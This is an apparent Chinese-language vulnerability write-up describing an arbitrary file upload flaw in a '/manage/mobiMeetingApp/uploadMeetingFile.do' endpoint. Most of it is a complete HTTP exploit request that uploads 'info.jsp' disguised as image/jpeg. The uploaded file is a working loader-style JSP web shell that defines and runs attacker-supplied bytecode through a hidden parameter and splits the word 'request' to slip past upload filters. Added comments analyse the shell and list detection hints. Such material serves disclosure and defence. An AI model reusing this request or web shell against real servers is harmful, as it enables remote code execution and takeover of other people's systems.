漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中。如果上传功能未能正确地验证和限制上传文件的类型和内容（例如仅依据客户端提交的 Content-Type 判断文件类型，而不校验文件扩展名与实际内容），攻击者可能利用此漏洞上传恶意文件，如包含可执行代码的脚本文件（下例为 JSP），从而在服务器上执行任意命令，控制或破坏系统。下面的请求以 image/jpeg 的 Content-Type 提交了一个名为 info.jsp 的文件，文件内容是一个通过 ClassLoader.defineClass 加载任意字节码的 JSP 木马。需要注意：请求携带了 Token 请求头，说明该接口可能需要有效的会话凭据，是否为未授权上传本页未说明；页面也未给出服务器响应和文件落地路径，因此上传的文件是否被保存到可通过 Web 访问且会解析 JSP 的目录，仍需另行验证。
POST /manage/mobiMeetingApp/uploadMeetingFile.do HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1597
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Token: xxxxxxxxxxxxxxxxx
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="info.jsp"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:declaration>
// NOTE(review): this JSP document is the uploaded payload itself, not application code.
// It is a loader-style web shell: the declaration exposes ClassLoader.defineClass so that
// arbitrary bytecode supplied at request time can be loaded and executed inside the
// servlet container. The XML (jsp:root) form and the random identifiers are the shape
// the uploaded file takes; the code is reproduced unchanged here for analysis only.
//
// Detection hints visible in this file: a ClassLoader subclass whose only purpose is to
// widen defineClass, reflective lookup of sun.misc.BASE64Decoder / java.util.Base64 by
// string name, and a newInstance().equals(pageContext) call that hands the PageContext
// to the freshly defined class.

// Thin ClassLoader subclass that makes the protected defineClass(byte[], int, int)
// reachable from the scriptlet below.
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
// Defines a class straight from raw bytes; no class name, no checks beyond the JVM's own.
public Class GnDlLQpR(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
// Base64-decodes str. Tries sun.misc.BASE64Decoder first (removed in newer JDKs, hence
// the reflective lookup so the page still compiles there) and falls back to
// java.util.Base64. Resolving both by string name keeps the literal class references out
// of imports and direct calls, which looks like a signature-evasion choice (inferred).
public byte[] KWPXeYqY(String str) throws Exception {
try {
Class HnktBjpK = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) HnktBjpK.getMethod("decodeBuffer", String.class).invoke(HnktBjpK.newInstance(), str);
} catch (Exception e) {
Class HnktBjpK = Class.forName("java.util.Base64");
Object cUASwQYK = HnktBjpK.getMethod("getDecoder").invoke(null);
return (byte[]) cUASwQYK.getClass().getMethod("decode", String.class).invoke(cUASwQYK, str);
}
}
// Parent loader for U: the context class loader of the thread servicing the request,
// so the injected class can see the web application's own classes.
Thread cT = Thread.currentThread();
ClassLoader BfDrVfLM = cT.getContextClassLoader();
</jsp:declaration>
<jsp:scriptlet>
// "requ" followed by a CDATA section holding "est" is the single identifier request
// once the XML is parsed; the split exists only in the file text, presumably to defeat
// keyword-based upload filters. The parameter name asdowi243 is the attacker's trigger:
// a request without it runs nothing and produces no output.
String boWqnWUy = requ<![CDATA[est]]>.getParameter("asdowi243");
if (boWqnWUy != null) {
// Decode the parameter, define it as a class, instantiate it, and pass the PageContext
// in through equals(). What the class does with pageContext is not in this file; it is
// whatever bytecode the operator sends with each request.
Class IFwYZevI = new U(BfDrVfLM).GnDlLQpR(KWPXeYqY(boWqnWUy));
IFwYZevI.newInstance().equals(pageContext);
}
</jsp:scriptlet>
</jsp:root>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--